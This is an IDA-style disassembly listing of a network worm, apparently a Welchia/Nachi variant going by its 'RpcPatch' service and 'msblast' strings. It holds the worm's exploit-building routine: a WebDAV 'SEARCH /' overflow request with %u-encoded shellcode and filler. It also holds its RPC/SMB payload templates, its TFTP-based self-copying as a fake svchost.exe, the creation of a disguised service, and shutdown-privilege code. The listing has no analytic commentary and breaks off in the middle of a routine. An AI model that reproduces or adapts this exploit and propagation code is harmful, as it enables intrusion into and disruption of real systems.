; ---------------------------------------------------------------------------
loc_401C6C: ; CODE XREF: sub_401B90+93�j
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
pop ecx
retn
sub_401B90 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401C80 proc near ; DATA XREF: sub_401990+116�o
var_404 = dword ptr -404h
var_400 = byte ptr -400h
var_3FF = byte ptr -3FFh
arg_0 = dword ptr 4
sub esp, 404h
mov eax, [esp+404h+arg_0]
push ebp
push esi
push edi
mov esi, [eax]
mov ecx, 0FFh
xor eax, eax
lea edi, [esp+410h+var_3FF]
mov [esp+410h+var_400], 0
push 4
rep stosd
lea ecx, [esp+414h+var_404]
mov [esp+414h+var_404], 1388h
stosw
push ecx
push 1006h
push 0FFFFh
push esi
stosb
call dword_404164 ; setsockopt
mov edi, dword_40416C
push 0
lea edx, [esp+414h+var_400]
push 3FFh
push edx
push esi
call edi ; dword_40416C
cmp eax, 0FFFFFFFFh
jz loc_401E54
test eax, eax
jz loc_401E54
mov ebp, dword_404100
lea eax, [esp+410h+var_400]
push offset aMicrosoftWindo ; "Microsoft Windows"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jz loc_401E54
lea ecx, [esp+410h+var_400]
push offset dword_4061BC
push ecx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401D4D
loc_401D1D: ; CODE XREF: sub_401C80+CB�j
push 0
lea edx, [esp+414h+var_400]
push 3FFh
push edx
push esi
call edi ; dword_40416C
cmp eax, 0FFFFFFFFh
jz loc_401E54
mov [esp+eax+410h+var_400], 0
lea eax, [esp+410h+var_400]
push offset dword_4061BC
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jz short loc_401D1D
loc_401D4D: ; CODE XREF: sub_401C80+9B�j
lea ecx, [esp+410h+var_400]
push ecx
push offset aDirWinsDllhost ; "dir wins\\dllhost.exe\n\r"
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz loc_401E54
lea edx, [esp+410h+var_400]
push offset aDllhost_exe ; "DLLHOST.EXE"
push edx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz loc_401E54
lea eax, [esp+410h+var_400]
push offset aDllhost_exe_0 ; "dllhost.exe"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz loc_401E54
lea ecx, [esp+410h+var_400]
push ecx
push offset aDirDllcacheTft ; "dir dllcache\\tftpd.exe\n\r"
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz loc_401E54
lea edx, [esp+410h+var_400]
push offset aTftpd_exe_0 ; "tftpd.exe"
push edx
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401DF0
lea eax, [esp+410h+var_400]
push offset aTftpd_exe ; "TFTPD.EXE"
push eax
call ebp ; dword_404100
add esp, 8
test eax, eax
jnz short loc_401DF0
lea ecx, [esp+410h+var_400]
push ecx
push offset dword_407628
push esi
call sub_401B90
add esp, 0Ch
test eax, eax
jz short loc_401E54
jmp short loc_401E07
; ---------------------------------------------------------------------------
loc_401DF0: ; CODE XREF: sub_401C80+142�j
; sub_401C80+155�j
lea edx, [esp+410h+var_400]
push edx
push offset aCopyDllcacheTf ; "copy dllcache\\tftpd.exe wins\\svchost.ex"...
push esi
call sub_401B10
add esp, 0Ch
test eax, eax
jz short loc_401E54
loc_401E07: ; CODE XREF: sub_401C80+16E�j
lea eax, [esp+410h+var_400]
push eax
push offset dword_4075A8
push esi
call sub_401B90
add esp, 0Ch
test eax, eax
jz short loc_401E54
mov ebp, dword_4040C8
push 1F4h
call ebp ; dword_4040C8
mov edi, offset aWinsDllhost_ex ; "wins\\DLLHOST.EXE\n\r"
or ecx, 0FFFFFFFFh
xor eax, eax
push 0
repne scasb
not ecx
dec ecx
push ecx
push offset aWinsDllhost_ex ; "wins\\DLLHOST.EXE\n\r"
push esi
call dword_404168 ; send
test eax, eax
jz short loc_401E54
push 3E8h
call ebp ; dword_4040C8
loc_401E54: ; CODE XREF: sub_401C80+5F�j
; sub_401C80+67�j ...
push esi
call dword_404170 ; closesocket
pop edi
pop esi
mov eax, [esp+408h+arg_0]
pop ebp
test eax, eax
jz short loc_401E72
push eax
call sub_402FC6
add esp, 4
loc_401E72: ; CODE XREF: sub_401C80+1E7�j
mov eax, 1
add esp, 404h
retn 4
sub_401C80 endp
; =============== S U B R O U T I N E =======================================
sub_401E80 proc near ; CODE XREF: sub_401210:loc_401217�p
; sub_401210+17�p
push offset aMicrosoft_com ; "microsoft.com"
call dword_404160 ; gethostbyname
neg eax
sbb eax, eax
neg eax
retn
sub_401E80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401EA0 proc near ; CODE XREF: sub_401210:loc_401230�p
var_70 = dword ptr -70h
var_64 = byte ptr -64h
sub esp, 74h
lea eax, [esp+74h+var_64]
push esi
push 64h
push eax
call dword_404158 ; gethostname
cmp eax, 0FFFFFFFFh
jz short loc_401F1D
lea ecx, [esp+78h+var_64]
push ecx
call dword_404160 ; gethostbyname
test eax, eax
jz short loc_401F1D
mov edx, [eax+0Ch]
mov esi, [edx]
test esi, esi
jz short loc_401F1D
movsx ecx, word ptr [eax+0Ah]
mov eax, ecx
push edi
lea edi, [esp+7Ch+var_70]
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [esp+7Ch+var_70]
push ecx
call dword_40415C ; inet_ntoa
mov edi, eax
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, 1
mov edx, ecx
mov esi, edi
mov edi, offset dword_407478
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
pop edi
pop esi
add esp, 74h
retn
; ---------------------------------------------------------------------------
loc_401F1D: ; CODE XREF: sub_401EA0+14�j
; sub_401EA0+23�j ...
xor eax, eax
pop esi
add esp, 74h
retn
sub_401EA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401F30 proc near ; CODE XREF: sub_401280+A5�p
var_50 = byte ptr -50h
sub esp, 50h
or ecx, 0FFFFFFFFh
xor eax, eax
push esi
push edi
mov edi, offset aSearch ; "SEARCH /"
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ds:dword_4075A0
shr ecx, 2
rep movsd
mov ecx, eax
mov eax, 41414141h
and ecx, 3
rep movsb
mov edx, ds:dword_4075A0
mov ecx, 41h
mov dword_406424, 8
mov esi, offset aU5951U6858U759 ; "%u5951%u6858%u759f%u0018%u5951%u6858%u7"...
lea edi, [edx+8]
rep stosd
stosb
mov eax, dword_406424
mov edx, ds:dword_4075A0
add eax, 105h
mov ecx, 41414141h
mov dword_406424, eax
add eax, edx
mov [eax], ecx
mov [eax+4], ecx
mov eax, dword_406424
mov ecx, ds:dword_4075A0
add eax, 8
mov dword_406424, eax
lea edi, [eax+ecx]
mov ecx, 30h
rep movsd
movsb
mov eax, dword_406424
mov edx, ds:dword_4075A0
add eax, 0C0h
mov ecx, 31h
mov esi, offset aU5390U665eU66a ; "%u5390%u665e%u66ad%u993d%u7560%u56f8%u5"...
mov dword_406424, eax
lea edi, [eax+edx]
rep movsd
movsw
movsb
mov eax, dword_406424
mov ecx, ds:dword_4075A0
add eax, 0C6h
mov esi, offset aFfilomidomfafd ; "ffilomidomfafdfgfhinhnlaljbeaaaaaalimmm"...
mov dword_406424, eax
lea edi, [eax+ecx]
mov ecx, 55h
rep movsd
movsb
mov edx, dword_406424
mov esi, ds:dword_4075A0
add edx, 154h
mov ecx, 3F52h
mov eax, 4E4E4E4Eh
mov dword_406424, edx
lea edi, [edx+esi]
mov esi, offset aHttp1_1Host127 ; " HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Typ"...
rep stosd
stosw
mov eax, dword_406424
mov edx, ds:dword_4075A0
mov ecx, 14h
lea edi, [esp+58h+var_50]
add eax, 0FD4Ah
rep movsd
lea edi, [eax+edx]
mov ecx, 14h
lea esi, [esp+58h+var_50]
mov dword_406424, eax
rep movsd
mov eax, dword_406424
mov esi, offset loc_40597E
add eax, 4Fh
mov dword_406424, eax
lea ecx, [eax+0E7h]
lea edx, [eax+0ECh]
mov dword_40642C, ecx
mov ecx, ds:dword_4075A0
mov ds:dword_407470, edx
lea edi, [eax+ecx]
mov ecx, 5Dh
rep movsd
movsw
mov eax, dword_406424
mov esi, ds:dword_4075A0
mov cx, word_406238
mov dl, byte_40623A
add eax, 175h
pop edi
mov dword_406424, eax
add eax, esi
pop esi
mov [eax], cx
mov [eax+2], dl
mov eax, dword_406424
add eax, 2
mov dword_406424, eax
add esp, 50h
retn
sub_401F30 endp
; =============== S U B R O U T I N E =======================================
sub_4020E0 proc near ; CODE XREF: sub_401210+57�p
mov ax, word_405B68
push eax
call dword_404174 ; ntohs
mov ecx, ds:dword_4075A0
mov edx, dword_40642C
xor eax, 9999h
push offset dword_407478
mov [edx+ecx], ax
call dword_404194 ; inet_addr
mov ecx, ds:dword_4075A0
mov edx, ds:dword_407470
xor eax, 99999999h
mov [edx+ecx], eax
retn
sub_4020E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402130 proc near ; CODE XREF: sub_401210+5C�p
mov ax, word_405B68
push eax
call dword_404174 ; ntohs
mov ecx, dword_406428
xor eax, 9999h
push offset dword_407478
mov word ptr dword_406470[ecx], ax
call dword_404194 ; inet_addr
mov edx, ds:dword_407474
xor eax, 99999999h
mov dword_406470[edx], eax
retn
sub_402130 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402170 proc near ; CODE XREF: sub_401280+AA�p
push esi
mov eax, dword_4057DC
push edi
mov ecx, 0D8h
mov esi, offset dword_40547C
mov edi, offset dword_406470
rep movsd
mov ecx, dword_4057E4
add eax, 166h
add ecx, 166h
mov dword_4057DC, eax
mov dword_4057E4, ecx
mov dword_4067D8, ecx
mov ecx, dword_4057E8
mov dword_4067D0, eax
mov eax, dword_4057E0
mov dword_4067DC, ecx
mov ecx, 0B3h
mov esi, offset aFxnbfxfxnbfxfx ; "FXNBFXFXNBFXFXFXFX"
mov edi, offset dword_4067E0
mov edx, dword_405484
mov dword_40584C, 100139Dh
mov dword_4067D4, eax
rep movsd
mov ecx, 0Fh
mov esi, offset aC1234561111111 ; "\\C$\\123456111111111111111.doc"
mov edi, offset dword_406AAC
add edx, 2C0h
rep movsd
mov ecx, 0Ch
mov esi, offset dword_405AF4
mov edi, offset dword_406AE8
mov eax, 2C0h
rep movsd
mov esi, dword_406480
mov ecx, dword_4064F4
mov edi, dword_406524
mov dword_406478, edx
mov edx, dword_4064F0
add esi, eax
add edx, eax
add ecx, eax
mov dword_406480, esi
mov esi, dword_406528
mov dword_4064F0, edx
mov edx, dword_406540
mov dword_4064F4, ecx
mov ecx, dword_4065FC
add edi, eax
add esi, eax
mov dword_406524, edi
add edx, eax
add ecx, eax
mov dword_406528, esi
pop edi
mov dword_406428, 5ADh
mov ds:dword_407474, 5B2h
mov dword_406420, 6A8h
mov dword_406540, edx
mov dword_4065FC, ecx
pop esi
retn
sub_402170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4022A0 proc near ; CODE XREF: sub_401780+1E8�p
; DATA XREF: sub_40B5BD+2E�w
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
arg_4 = dword ptr 8
sub esp, 14h
lea eax, [esp+14h+var_14]
push eax
push 28h
call dword_40409C ; GetCurrentProcess
push eax
call dword_404044 ; OpenProcessToken
lea ecx, [esp+10h+var_8]
push ecx
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
push 0
call dword_404048 ; LookupPrivilegeValueA
mov eax, [esp+10h+var_10]
push 0
push 0
lea edx, [esp+18h+var_C]
push 0
push edx
push 0
push eax
mov [esp+28h+var_C], 1
mov dword ptr [esp+28h], 2
call dword_404028 ; AdjustTokenPrivileges
mov ecx, [esp+10h+arg_4]
push 0
loc_4022F7: ; DATA XREF: sub_40B54E�w
; sub_40B54E+29�r
or ecx, 4
push ecx
call dword_404148 ; ExitWindowsEx
add esp, 14h
retn
sub_4022A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402310 proc near ; CODE XREF: sub_401780+8�p
var_9C = dword ptr -9Ch
var_94 = dword ptr -94h
sub esp, 9Ch
call dword_404094 ; GetVersion
and eax, 0FFh
lea ecx, [esp+9Ch+var_9C]
cmp eax, 5
push ecx
sbb eax, eax
and al, 0F8h
add eax, 9Ch
mov [esp+0A0h+var_9C], eax
call dword_404098 ; GetVersionExA
mov eax, [esp+9Ch+var_94]
add esp, 9Ch
retn
sub_402310 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402350 proc near ; CODE XREF: sub_402390+D�p
; sub_402390+21�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
lea eax, [esp+arg_0]
push eax
push 1
push 0
push ecx
push 80000002h
call dword_40403C ; RegOpenKeyExA
test eax, eax
jnz short loc_40237E
mov edx, [esp+arg_0]
push edx
call dword_404040 ; RegCloseKey
mov eax, 1
retn
; ---------------------------------------------------------------------------
loc_40237E: ; CODE XREF: sub_402350+1B�j
xor eax, eax
retn
sub_402350 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402390 proc near ; CODE XREF: sub_401780+1D�p
; sub_401780+1DA�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jnz short loc_4023AC
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Updates\\Windows 2000"...
call sub_402350
add esp, 4
neg eax
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_4023AC: ; CODE XREF: sub_402390+6�j
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\Updates\\Windows XP\\S"...
call sub_402350
add esp, 4
test eax, eax
jnz short loc_4023CF
push offset aSoftwareMicr_1 ; "SOFTWARE\\Microsoft\\Updates\\Windows XP\\S"...
call sub_402350
add esp, 4
test eax, eax
jnz short loc_4023CF
retn
; ---------------------------------------------------------------------------
loc_4023CF: ; CODE XREF: sub_402390+2B�j
; sub_402390+3C�j
mov eax, 1
retn
sub_402390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4023E0 proc near ; CODE XREF: sub_4015E0+61�p
; sub_401660+5C�p
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_107 = byte ptr -107h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
sub esp, 110h
push ebx
push ebp
push esi
push edi
push 0F003Fh
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov ebp, eax
test ebp, ebp
jnz short loc_40240A
pop edi
pop esi
pop ebp
pop ebx
add esp, 110h
retn
; ---------------------------------------------------------------------------
loc_40240A: ; CODE XREF: sub_4023E0+1D�j
mov ecx, 41h
xor eax, eax
lea edi, [esp+120h+var_107]
mov [esp+120h+var_108], 0
rep stosd
mov edi, [esp+120h+arg_8]
lea eax, [esp+120h+var_108]
push edi
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
push offset aSWinsS ; "%s\\wins\\%s"
push eax
call dword_40411C ; sprintf
push offset aSvchost_exe ; "svchost.exe"
push edi
mov esi, 2
call dword_404140 ; _stricmp
add esp, 18h
test eax, eax
jnz short loc_402456
mov esi, 3
loc_402456: ; CODE XREF: sub_4023E0+6F�j
push 0
mov edx, [esp+124h+arg_4]
push 0
mov eax, [esp+128h+arg_0]
push 0
push 0
lea ecx, [esp+130h+var_108]
push 0
push ecx
push 0
push esi
push 110h
push 0F01FFh
push edx
push eax
push ebp
call dword_404030 ; CreateServiceA
mov ebx, eax
test ebx, ebx
jnz short loc_4024A3
push ebp
call dword_404034 ; CloseServiceHandle
pop edi
pop esi
pop ebp
xor eax, eax
pop ebx
add esp, 110h
retn
; ---------------------------------------------------------------------------
loc_4024A3: ; CODE XREF: sub_4023E0+AD�j
mov ecx, [esp+120h+arg_C]
push 0F01FFh
push ecx
push ebp
mov [esp+12Ch+var_110], offset aManagesNetwork ; "Manages network configuration by updati"...
xor esi, esi
call dword_404038 ; OpenServiceA
mov edi, eax
test edi, edi
jz short loc_402507
push 400h
push 40h
mov [esp+128h+var_10C], esi
call dword_40408C ; LocalAlloc
mov esi, eax
test esi, esi
jz short loc_4024FC
lea edx, [esp+120h+var_10C]
push edx
push 400h
push esi
push 1
push edi
call dword_404004 ; QueryServiceConfig2A
test eax, eax
jz short loc_4024FC
mov eax, [esi]
mov [esp+120h+var_110], eax
loc_4024FC: ; CODE XREF: sub_4023E0+FC�j
; sub_4023E0+114�j
push edi
mov edi, dword_404034
call edi ; dword_404034
jmp short loc_40250D
; ---------------------------------------------------------------------------
loc_402507: ; CODE XREF: sub_4023E0+E5�j
mov edi, dword_404034
loc_40250D: ; CODE XREF: sub_4023E0+125�j
lea ecx, [esp+120h+var_110]
push ecx
push 1
push ebx
call dword_404000 ; ChangeServiceConfig2A
test esi, esi
jz short loc_402526
push esi
call dword_404090 ; LocalFree
loc_402526: ; CODE XREF: sub_4023E0+13D�j
push ebx
call edi ; dword_404034
push ebp
call edi ; dword_404034
pop edi
pop esi
pop ebp
mov eax, 1
pop ebx
add esp, 110h
retn
sub_4023E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402540 proc near ; CODE XREF: sub_401280+EC�p
; sub_401280+110�p
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_114 = dword ptr -114h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
arg_0 = dword ptr 4
sub esp, 134h
push ebp
push edi
push 0F003Fh
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov ebp, eax
test ebp, ebp
mov [esp+13Ch+var_134], ebp
jnz short loc_40256A
pop edi
pop ebp
add esp, 134h
retn
; ---------------------------------------------------------------------------
loc_40256A: ; CODE XREF: sub_402540+1F�j
push offset aCWindowsSystem ; "C:\\WINDOWS\\system32"
lea eax, [esp+140h+var_104]
push offset aDSWins ; "-d%s\\wins"
push eax
mov [esp+148h+var_130], 0
call dword_40411C ; sprintf
mov edx, [esp+148h+arg_0]
add esp, 0Ch
lea ecx, [esp+13Ch+var_104]
push 0F01FFh
push edx
push ebp
mov [esp+148h+var_128], ecx
call dword_404038 ; OpenServiceA
mov edi, eax
test edi, edi
jnz short loc_4025B5
pop edi
pop ebp
add esp, 134h
retn
; ---------------------------------------------------------------------------
loc_4025B5: ; CODE XREF: sub_402540+6A�j
push ebx
push esi
push 400h
push 40h
call dword_40408C ; LocalAlloc
mov esi, dword_40401C
mov ebx, eax
lea eax, [esp+13Ch+var_118]
mov [esp+13Ch+var_124], ebx
push eax
push edi
call esi ; dword_40401C
test eax, eax
jnz short loc_4025E3
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_4025E3: ; CODE XREF: sub_402540+9A�j
mov eax, [esp+13Ch+var_114]
cmp eax, 4
jz loc_402709
cmp eax, 2
jz loc_402709
lea ecx, [esp+13Ch+var_11C]
push ecx
push 400h
push ebx
push edi
call dword_404020 ; QueryServiceConfigA
test eax, eax
jnz short loc_402616
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_402616: ; CODE XREF: sub_402540+CD�j
cmp dword ptr [ebx+4], 4
jnz short loc_402642
push 0
push 0
push 0
push 0
push 0
push 0
push 0
push 0FFFFFFFFh
push 3
push 0FFFFFFFFh
push edi
call dword_404024 ; ChangeServiceConfigA
test eax, eax
jnz short loc_402642
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_402642: ; CODE XREF: sub_402540+DA�j
; sub_402540+F9�j
lea edx, [esp+13Ch+var_120]
push edx
push 1
push edi
call dword_404008 ; StartServiceA
test eax, eax
jnz short loc_40265B
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_40265B: ; CODE XREF: sub_402540+112�j
lea eax, [esp+13Ch+var_118]
push eax
push edi
call esi ; dword_40401C
test eax, eax
jnz short loc_40266E
xor esi, esi
jmp loc_40270E
; ---------------------------------------------------------------------------
loc_40266E: ; CODE XREF: sub_402540+125�j
cmp [esp+13Ch+var_114], 2
jnz loc_4026F9
mov ebp, dword_4040C8
mov ebx, dword_4040C0
mov esi, [esp+13Ch+var_11C]
loc_402689: ; CODE XREF: sub_402540+1AF�j
mov eax, 0CCCCCCCDh
mul [esp+13Ch+var_100]
shr edx, 3
cmp edx, 3E8h
jnb short loc_4026A4
mov edx, 3E8h
jmp short loc_4026B1
; ---------------------------------------------------------------------------
loc_4026A4: ; CODE XREF: sub_402540+15B�j
cmp edx, 2710h
jbe short loc_4026B1
mov edx, 2710h
loc_4026B1: ; CODE XREF: sub_402540+162�j
; sub_402540+16A�j
push edx
call ebp ; dword_4040C8
lea ecx, [esp+13Ch+var_118]
push ecx
push edi
call dword_40401C ; QueryServiceStatus
test eax, eax
jz short loc_4026F1
mov edx, [esp+13Ch+var_128]
mov eax, [esp+13Ch+var_104]
cmp eax, edx
jbe short loc_4026DE
call ebx ; dword_4040C0
mov esi, eax
mov eax, [esp+13Ch+var_104]
mov [esp+13Ch+var_128], eax
jmp short loc_4026EA
; ---------------------------------------------------------------------------
loc_4026DE: ; CODE XREF: sub_402540+18E�j
call ebx ; dword_4040C0
mov ecx, [esp+13Ch+var_100]
sub eax, esi
cmp eax, ecx
ja short loc_4026F1
loc_4026EA: ; CODE XREF: sub_402540+19C�j
cmp [esp+13Ch+var_114], 2
jz short loc_402689
loc_4026F1: ; CODE XREF: sub_402540+182�j
; sub_402540+1A8�j
mov ebp, [esp+13Ch+var_12C]
mov ebx, [esp+13Ch+var_124]
loc_4026F9: ; CODE XREF: sub_402540+133�j
mov eax, [esp+13Ch+var_114]
xor ecx, ecx
cmp eax, 4
setz cl
mov esi, ecx
jmp short loc_40270E
; ---------------------------------------------------------------------------
loc_402709: ; CODE XREF: sub_402540+AA�j
; sub_402540+B3�j
mov esi, 1
loc_40270E: ; CODE XREF: sub_402540+9E�j
; sub_402540+D1�j ...
push ebx
call dword_404090 ; LocalFree
push edi
mov edi, dword_404034
call edi ; dword_404034
push ebp
call edi ; dword_404034
mov eax, esi
pop esi
pop ebx
pop edi
pop ebp
add esp, 134h
retn
sub_402540 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402730 proc near ; CODE XREF: sub_4011C0+1F�p
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
sub esp, 1Ch
push esi
push edi
push 80000000h
push 0
push 0
call dword_40402C ; OpenSCManagerA
mov edi, eax
test edi, edi
jnz short loc_402755
pop edi
mov eax, 11111111h
pop esi
add esp, 1Ch
retn
; ---------------------------------------------------------------------------
loc_402755: ; CODE XREF: sub_402730+18�j
push 0F01FFh
push offset aRpcpatch ; "RpcPatch"
push edi
call dword_404038 ; OpenServiceA
mov esi, eax
test esi, esi
jnz short loc_402777
pop edi
mov eax, 22222222h
pop esi
add esp, 1Ch
retn
; ---------------------------------------------------------------------------
loc_402777: ; CODE XREF: sub_402730+3A�j
lea eax, [esp+24h+var_1C]
push eax
push esi
call dword_40401C ; QueryServiceStatus
test eax, eax
push esi
mov esi, dword_404034
jnz short loc_40279E
call esi ; dword_404034
push edi
call esi ; dword_404034
pop edi
mov eax, 33333333h
pop esi
add esp, 1Ch
retn
; ---------------------------------------------------------------------------
loc_40279E: ; CODE XREF: sub_402730+5C�j
call esi ; dword_404034
push edi
call esi ; dword_404034
mov eax, [esp+24h+var_18]
pop edi
pop esi
add esp, 1Ch
retn
sub_402730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027B0 proc near ; CODE XREF: sub_4011C0+6�p
push offset aRpcpatch_mutex ; "RpcPatch_Mutex"
push 0
push 0
call dword_404084 ; CreateMutexA
test eax, eax
jz short loc_4027D3
call dword_404060 ; RtlGetLastWin32Error
cmp eax, 0B7h
jz short loc_4027D3
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4027D3: ; CODE XREF: sub_4027B0+11�j
; sub_4027B0+1E�j
mov eax, 1
retn
sub_4027B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027E0 proc near ; CODE XREF: sub_4011C0:loc_4011FC�j
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 10h
xor eax, eax
mov [esp+10h+var_10], offset aRpcpatch ; "RpcPatch"
mov [esp+10h+var_8], eax
mov [esp+10h+var_4], eax
lea eax, [esp+10h+var_10]
mov [esp+10h+var_C], offset loc_402920
push eax
call dword_404018 ; StartServiceCtrlDispatcherA
neg eax
sbb eax, eax
neg eax
dec eax
add esp, 10h
retn
sub_4027E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402820 proc near ; CODE XREF: sub_402880+1A�p
; sub_402880+33�p ...
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
sub esp, 1Ch
mov eax, [esp+1Ch+arg_0]
mov ecx, [esp+1Ch+arg_8]
mov dword_405BA0, eax
mov [esp+1Ch+var_18], eax
mov eax, [esp+1Ch+arg_4]
lea edx, [esp+1Ch+var_1C]
mov [esp+1Ch+var_10], eax
mov eax, ds:dword_4076A8
push edx
push eax
mov [esp+24h+var_1C], 10h
mov [esp+24h+var_14], 5
mov [esp+24h+var_C], 0
mov [esp+24h+var_8], ecx
mov [esp+24h+var_4], 0BB8h
call dword_404014 ; SetServiceStatus
add esp, 1Ch
retn
sub_402820 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402880 proc near ; DATA XREF: seg000:loc_402920�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
dec eax
cmp eax, 3 ; switch 4 cases
ja short locret_402909 ; default
jmp off_40290C[eax*4] ; switch jump
loc_402891: ; DATA XREF: seg000:off_40290C�o
push 1388h ; jumptable 0040288A case 0
push 0
push 3
call sub_402820
add esp, 0Ch
push 3E8h
call dword_4040C8 ; Sleep
push 0
push 0
push 1
call sub_402820
add esp, 0Ch
retn 4
; ---------------------------------------------------------------------------
loc_4028BE: ; CODE XREF: sub_402880+A�j
; DATA XREF: seg000:off_40290C�o
push 1 ; jumptable 0040288A case 1
push 0
push 6
call sub_402820
push 0
push 0
push 7
call sub_402820
add esp, 18h
retn 4
; ---------------------------------------------------------------------------
loc_4028DA: ; CODE XREF: sub_402880+A�j
; DATA XREF: seg000:off_40290C�o
push 1 ; jumptable 0040288A case 2
push 0
push 5
call sub_402820
push 0
push 0
push 4
call sub_402820
add esp, 18h
retn 4
; ---------------------------------------------------------------------------
loc_4028F6: ; CODE XREF: sub_402880+A�j
; DATA XREF: seg000:off_40290C�o
mov ecx, dword_405BA0 ; jumptable 0040288A case 3
push 0
push 0
push ecx
call sub_402820
add esp, 0Ch
locret_402909: ; CODE XREF: sub_402880+8�j
retn 4 ; default
sub_402880 endp
; ---------------------------------------------------------------------------
off_40290C dd offset loc_402891 ; DATA XREF: sub_402880+A�r
dd offset loc_4028BE ; jump table for switch statement
dd offset loc_4028DA
dd offset loc_4028F6
align 10h
loc_402920: ; DATA XREF: sub_4027E0+19�o
push offset sub_402880
push offset aRpcpatch ; "RpcPatch"
call dword_404010 ; RegisterServiceCtrlHandlerA
test eax, eax
mov ds:dword_4076A8, eax
jz short locret_40296D
push 1
push 0
push 2
call sub_402820
push 0
push 0
push 4
call sub_402820
call sub_401280
push 0
push 0
push 3
call sub_402820
push 0
push 0
push 1
call sub_402820
add esp, 30h
locret_40296D: ; CODE XREF: seg000:00402937�j
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402970 proc near ; CODE XREF: sub_401280+4E�p
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 210h
push esi
mov esi, dword_4040A8
lea eax, [ebp+var_10C]
push 104h
push eax
push 0
call esi ; dword_4040A8
lea ecx, [ebp+var_10C]
push ecx
call dword_404074 ; GetFileAttributesA
test al, 1
jz short loc_4029B1
and al, 0FEh
lea edx, [ebp+var_10C]
push eax
push edx
call dword_404078 ; SetFileAttributesA
loc_4029B1: ; CODE XREF: sub_402970+2F�j
push 0
call dword_40407C ; GetModuleHandleA
lea ecx, [ebp+var_210]
push 104h
push ecx
push eax
mov [ebp+var_4], eax
call esi ; dword_4040A8
push 4
call dword_4040E0 ; CloseHandle
lea eax, [ebp+var_210]
push 0
push 0
push eax
push dword_4040BC
push [ebp+var_4]
push dword_4040E8
push dword_404080
retn
sub_402970 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pop esi
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402A00 proc near ; CODE XREF: sub_401280+1E�p
; sub_401280+1D9�p
var_108 = byte ptr -108h
var_107 = byte ptr -107h
sub esp, 108h
push esi
push edi
push offset aMsblast ; "msblast"
call sub_401000
